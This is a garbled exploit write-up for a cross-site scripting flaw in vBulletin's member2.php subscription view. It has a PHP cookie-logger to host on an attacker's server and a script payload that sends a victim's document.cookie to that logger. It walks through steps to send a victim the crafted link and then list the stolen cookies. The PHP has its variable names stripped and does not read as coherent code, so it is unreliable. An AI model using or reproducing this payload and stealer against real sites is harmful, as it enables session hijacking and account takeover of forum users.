- Run this script on some host: "; } Else { = ""; = ""; } Print (); */ Print ("vBulletin XSS Injection Vulnerability: Exploit"); Print ("
");
      Print ("
"); Print ("vBulletin XSS Injection Vulnerability: Exploit\n"); Print ("Coded By: Sp.IC
"); /* Print (); */ Switch (['Action']) { Case "Log": = ['Cookie']; = StrStr (, SubStr (, BCAdd (0x0D, StrLen (DecHex (MD5 (NULL)))))); = FOpen (, "a+"); FWrite (, Trim () . "\n"); FClose (); Print (""); Break; Case "List": If (!File_Exists () || !In_Array ()) { Print ("

There are No Records
"); Exit (); } Else { Print (""); = Array_UniQue (File ()); Print ("
");

                     Print (".:: Statics\n");
                     Print ("\n");

                     Print ("^ Logged Records : " . Count (File
()) . "\n");
                     Print ("^ Listed Records : " . Count

() . " [Not Counting Duplicates]\n");
                     Print ("\n");

                     Print (".:: Options\n");
                     Print ("\n");

                     If (Count (File ()) > 0) {

                         ['Download'] = "[Download]";

                     }
                     Else{

                         ['Download'] = "[No Records in Log]";

                     }

                     Print ("^ Download Log   : " . 
['Download'] . "\n");
                     Print ("^ Clear Records  : [Y]\n");
                     Print ("\n");

                     Print (".:: Records\n");
                     Print ("\n");

                     While (List ([0], [1]) = Each ()) {

                         Print ("" . [0] . ": " . [1]);

                     }

                 }

                 Print ("
"); Break; Case "Delete": @UnLink (); Print ("

Deleted Succsesfuly") Or Die ("

Error: Cannot Delete Log"); Print (""); Break; } ?> - Give a victim this link: member2.php?s=[Session] &action=viewsubscription&perpage=[Script Code] - Note: You can replace [Script Code] with: -- ><Script>location='Http://[Exploit Path]?Action=Log&Cookie='+ (document.cookie);</Script> - Then go to Http://[Exploit Path]?Action=List